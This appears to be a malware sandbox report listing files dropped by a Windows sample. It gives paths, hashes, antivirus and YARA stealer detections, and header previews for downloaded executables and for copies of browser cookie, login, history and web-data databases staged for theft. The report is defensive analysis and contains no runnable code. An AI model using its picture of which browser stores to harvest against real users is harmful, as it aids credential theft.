Process:	C:\ProgramData\MPGPH1\MPGPH1.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	42
Entropy (8bit):	4.0050635535766075
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUy:Q3La/xwQ
MD5:	84CFDB4B995B1DBF543B26B86C863ADC
SHA1:	D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256:	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512:	485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MSIUpdaterV1.exe.log

Download File

Process:	C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.0050635535766075
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUy:Q3La/xwQ
MD5:	84CFDB4B995B1DBF543B26B86C863ADC
SHA1:	D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256:	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512:	485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\U8cABsPhZFkKRrQ4rE0N.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.0050635535766075
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUy:Q3La/xwQ
MD5:	84CFDB4B995B1DBF543B26B86C863ADC
SHA1:	D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256:	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512:	485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Retailer_prog[1].exe

Download File

Process:	C:\Users\user\Desktop\OJa1BOigU3.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6990616
Entropy (8bit):	7.983839049537993
Encrypted:	false
SSDEEP:	196608:E9NDuIIL6QK4nK4emAWV3ogzbxfZdszlydO:2EL6lsKDmztogzblZdEn
MD5:	5158FED3EE415791BB7A7A3712373383
SHA1:	B21E19150DD6DF55B4578849FC4B6266E5B90829
SHA-256:	E3EEA6EF7EF2314970047B0A887C67D780EED12D40D5931E0A3E72061DE5E746
SHA-512:	498B4F7C867181C63F6C3D3243D5ADE76EE5874B65F7273CFE0AE32B52EEED9009443A2F315A1815B45A7542C1673F2B0B5119727146BFFB91F255BF54391C28
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 45% Antivirus: Virustotal, Detection: 42%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....96f...............'.....>....................@.................................A]k...@.................................PUO.@........_...........Jj..a...................................K.......g..@.............N.......@....................text.............................. ..`.rdata..2~..........................@..@.data...0I...P......................@....vmp....5......................... ..`.vmp..,.....N.....................@....vmp..@.\...N...\................. ..`.reloc................\.............@..@.rsrc...._.......`....\.............@..@................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\retailerTest[1].exe

Download File

Process:	C:\Users\user\Desktop\OJa1BOigU3.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1896048
Entropy (8bit):	7.954279347337501
Encrypted:	false
SSDEEP:	49152:Foa3d+XWOTnKjKZpLq2FDwCfy90x87tSbervz8jyrHPmr7r:FoyddOTnK0LNcDeMAerL8ebPMn
MD5:	3A2BDF3F22AF20AE6E0F2552C9301222
SHA1:	D0FB7F1B437D2C06D9563855D797A41BBCC8FEEF
SHA-256:	B7874820D3ED5758EF459882D3C3D540ACF1E6170F4EA7DC1CC6168544B18C2B
SHA-512:	FBB173F5DF2E0FD0A842E1ED3249F4BB036734105F6D2ADAE8510F25E4CCECC0FEC9737FD110E84C3EAA4F9BB3C54598320194FC51D3C471F851FF8CA2ADB847
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 62%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........c,.i...i...i..C..~.i..C..~:i..C..~.i..R..~.i..R..~.i..C..~.i...i...i..R..~.i..c..~.i..c....i..c..~.i..Rich.i..........................PE..L.....6f...............'.^...v...............p....@......................................@.....................................<.......................p&..........................................0...@............p..<............................text...1\.......^.................. ..`.rdata.......p.......b..............@..@.data.... ... ......................@....bss........P......................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\lumma2804[1].exe

Download File

Process:	C:\Users\user\Desktop\OJa1BOigU3.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	483440
Entropy (8bit):	7.62615419370465
Encrypted:	false
SSDEEP:	12288:ub3IzlSJCfjT1CDcLfSsYxolZ0B3HpCO00N4:ub3gMMT1iqSRxovg3HE+4
MD5:	46C72D686C836F3C97CE18B81B0D9864
SHA1:	FDADD2E3CD971CD9FFFB3DE0F4A69ED0F77AE4A5
SHA-256:	DEAF3E009A0A9DF61E84C2BEFDB5DB10599F47C03FBDEFBBDCE83AAC3A969CD1
SHA-512:	1AB8C8967155913C5DD0E2853D663BB096571062680DE246FDDA370947F7B6C3D2F44B85BE97B821C630A4A42B3990D78601615737C3CED1418C9CCF18611208
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\lumma2804[1].exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....7f.................0...........N... ...`....@.. ....................................`..................................N..K....`..<............:..p&..........GN............................................... ............... ..H............text........ ...0.................. ..`.rsrc...<....`.......2..............@..@.reloc...............8..............@..B.................N......H.......4Q...................#...........................................0..j.......~....:_.........~....(.... .... .... ....s....~....(............~....(....~....(.... ....?....r...ps....z...(........]*....0............i. .......... .............8X........:........d....~....(......~....(....&.........8..........(...........~....(......X.. ....?........8B........ ....;...... ....;............XX.. ....]...................X.. ....?...........8.......8......X ....].....X ....]

C:\Users\user\AppData\Local\RageMP1\RageMP1.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	65440
Entropy (8bit):	6.049806962480652
Encrypted:	false
SSDEEP:	768:X8XcJiMjm2ieHlPyCsSuJbn8dBhFwlSMF6Iq8KSYDKbQ22qWqO8w1R:rYMaNylPYSAb8dBnsHsPDKbQBqTY
MD5:	0D5DF43AF2916F47D00C1573797C1A13
SHA1:	230AB5559E806574D26B4C20847C368ED55483B0
SHA-256:	C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
SHA-512:	F96CF9E1890746B12DAF839A6D0F16F062B72C1B8A40439F96583F242980F10F867720232A6FA0F7D4D7AC0A7A6143981A5A130D6417EA98B181447134C7CFE2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0.............^.... ........@.. ....................... .......F....`.....................................O.......8................A........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P.....0.."........(......-.r...p.rI..p(....s....z....0..........(....~P.....o........(....n(.....(..........%...(....~(.....(..........%...%...(.....(.....(..........%...%...%...(....V.(......}Q.....}R.....{Q.....{R......0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......

C:\Users\user\AppData\Local\Temp\RLhyDRs2UHaLI0bTHvNtryI.zip

Download File

Process:	C:\Users\user\Desktop\OJa1BOigU3.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	701778
Entropy (8bit):	7.997953608655274
Encrypted:	true
SSDEEP:	12288:v+bIUXDJxjfHQGOReFQXqyjIq3SXR5wE0Ua+3c6x+PW5DqqAbXj1wfbxsmJETR:vyXDJ5iYijHCXRyZGcpPiqjD+TxnwR
MD5:	E2BF5FB6C4C9CB1949A485DE744AAAF0
SHA1:	8B4D8C6C42AD087B0F35393ACBE3D18C7EAA27C6
SHA-256:	D4E690D48794B85FBEF956B842CD4E962C43C8BB7A8277593D06D20441C859ED
SHA-512:	55DD670DB948E70AF027C335E0FC681DED950F19DE46EE0B1B6E7F357ADA14B7B260AC83FBF6BE8BE7C960D0482281C8EA6DAA26A1946E4A29A6A184B43E8676
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: C:\Users\user\AppData\Local\Temp\RLhyDRs2UHaLI0bTHvNtryI.zip, Author: Joe Security
Preview:	PK.........>.X................Cookies\..PK.........>.XQn.+............Cookies\Chrome_Default.txt.G..r...U.#.5C.....s$..-.D...7.\..$.G.)o....:....Z.C.f_..pm............"..t..t....}.k.@...a.2+P`.0.x.>....s..k%.._..b..P..((......B.....`.7..-m..JY..F....E..l.....I..&.....<J..M.......,V...)b.....Q..k......M?.5L....h}......X..'.0..tB.G...\;.a....4.......B4.......J.4.6.y:....4.-.UfE...3Ap.U5UX....Z.g:e.j.C..Bw..........e..a^.vU:....$..U......B..`._.e.....+...9.{u...7.e...H.]02...%yR".0...x...P<..N....R.}....{.G...;..c..x...kw.'S>.d\|.....B..k.9.t.!>.rh...~n.[....s#/....`.!..Kb8%&.vZB`....O\|.....>K......L...d0..03..t...T&.......`N.xp.."..J.......Q.....c..5...).Z.91.6.j..G.....Wr...a.52!..(^.U.....6....dB.D.^...7..0H.\J9.H.$^`e"..d...\....B.8Z=.qeP.3Y.>..'W.X..T..>z...,..K......g....%B.w4#...;.[]u\|....v...3.;L..U?..b.....u....... .......F...P.a...\|R3.=......r.:.64...#D..^..>.A..ZT.]E........t...f...1..3.....`...X.....C.]%...p.p.ym

C:\Users\user\AppData\Local\Temp\rage1MP.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.5073801024236357
Encrypted:	false
SSDEEP:	3:LhcT:i
MD5:	CCA2460EC49F867C0F9D9D6FFC405078
SHA1:	7F41407786BE6F9554632CD968C368179D531F55
SHA-256:	1C3D9BF2BF8D526E43795C26CA6218506326EC57C77CA58046760A6FC5048F51
SHA-512:	C580C801AAE96C34A2D054048D0610A52F50B8DAA3E5CF7B4264B19FF4DC99DB13D9FFE154FB069AF0A9648E6DD0900C42B6FEAD561F1A52481CC37A990A19A7
Malicious:	false
Preview:	1714979475133

C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\02zdBXl47cvzcookies.sqlite

Download File

Process:	C:\Users\user\Desktop\OJa1BOigU3.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\0Mju0xIVDG94Cookies

Download File

Process:	C:\Users\user\Desktop\OJa1BOigU3.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe

Download File

Process:	C:\Users\user\Desktop\OJa1BOigU3.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6990616
Entropy (8bit):	7.983839049537993
Encrypted:	false
SSDEEP:	196608:E9NDuIIL6QK4nK4emAWV3ogzbxfZdszlydO:2EL6lsKDmztogzblZdEn
MD5:	5158FED3EE415791BB7A7A3712373383
SHA1:	B21E19150DD6DF55B4578849FC4B6266E5B90829
SHA-256:	E3EEA6EF7EF2314970047B0A887C67D780EED12D40D5931E0A3E72061DE5E746
SHA-512:	498B4F7C867181C63F6C3D3243D5ADE76EE5874B65F7273CFE0AE32B52EEED9009443A2F315A1815B45A7542C1673F2B0B5119727146BFFB91F255BF54391C28
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 45%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....96f...............'.....>....................@.................................A]k...@.................................PUO.@........_...........Jj..a...................................K.......g..@.............N.......@....................text.............................. ..`.rdata..2~..........................@..@.data...0I...P......................@....vmp....5......................... ..`.vmp..,.....N.....................@....vmp..@.\...N...\................. ..`.reloc................\.............@..@.rsrc...._.......`....\.............@..@................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3b6N2Xdh3CYwplaces.sqlite

Download File

Process:	C:\Users\user\Desktop\OJa1BOigU3.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\7mWIlGgY7rrbLogin Data For Account

Download File

Process:	C:\Users\user\Desktop\OJa1BOigU3.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\AGHAk_8e2iEiHistory

Download File

Process:	C:\Users\user\Desktop\OJa1BOigU3.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\CBo4vvuzz0ClWeb Data

Download File

Process:	C:\Users\user\Desktop\OJa1BOigU3.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\D87fZN3R3jFeplaces.sqlite

Download File

Process:	C:\Users\user\Desktop\OJa1BOigU3.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\J2PITjCpOdmjWeb Data

Download File

Process:	C:\Users\user\Desktop\OJa1BOigU3.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\TEwtthWU56IyHistory

Download File

Process:	C:\Users\user\Desktop\OJa1BOigU3.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe

Download File

Process:	C:\Users\user\Desktop\OJa1BOigU3.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	483440
Entropy (8bit):	7.62615419370465
Encrypted:	false
SSDEEP:	12288:ub3IzlSJCfjT1CDcLfSsYxolZ0B3HpCO00N4:ub3gMMT1iqSRxovg3HE+4
MD5:	46C72D686C836F3C97CE18B81B0D9864
SHA1:	FDADD2E3CD971CD9FFFB3DE0F4A69ED0F77AE4A5
SHA-256:	DEAF3E009A0A9DF61E84C2BEFDB5DB10599F47C03FBDEFBBDCE83AAC3A969CD1
SHA-512:	1AB8C8967155913C5DD0E2853D663BB096571062680DE246FDDA370947F7B6C3D2F44B85BE97B821C630A4A42B3990D78601615737C3CED1418C9CCF18611208
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....7f.................0...........N... ...`....@.. ....................................`..................................N..K....`..<............:..p&..........GN............................................... ............... ..H............text........ ...0.................. ..`.rsrc...<....`.......2..............@..@.reloc...............8..............@..B.................N......H.......4Q...................#...........................................0..j.......~....:_.........~....(.... .... .... ....s....~....(............~....(....~....(.... ....?....r...ps....z...(........]*....0............i. .......... .............8X........:........d....~....(......~....(....&.........8..........(...........~....(......X.. ....?........8B........ ....;...... ....;............XX.. ....]...................X.. ....?...........8.......8......X ....].....X ....]

C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\UYZHb8v4tOq2History

Download File

Process:	C:\Users\user\Desktop\OJa1BOigU3.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\WehQmMlhJERELogin Data

Download File

Process:	C:\Users\user\Desktop\OJa1BOigU3.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\XCzgOmL99YpSWeb Data

Download File

Process:	C:\Users\user\Desktop\OJa1BOigU3.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

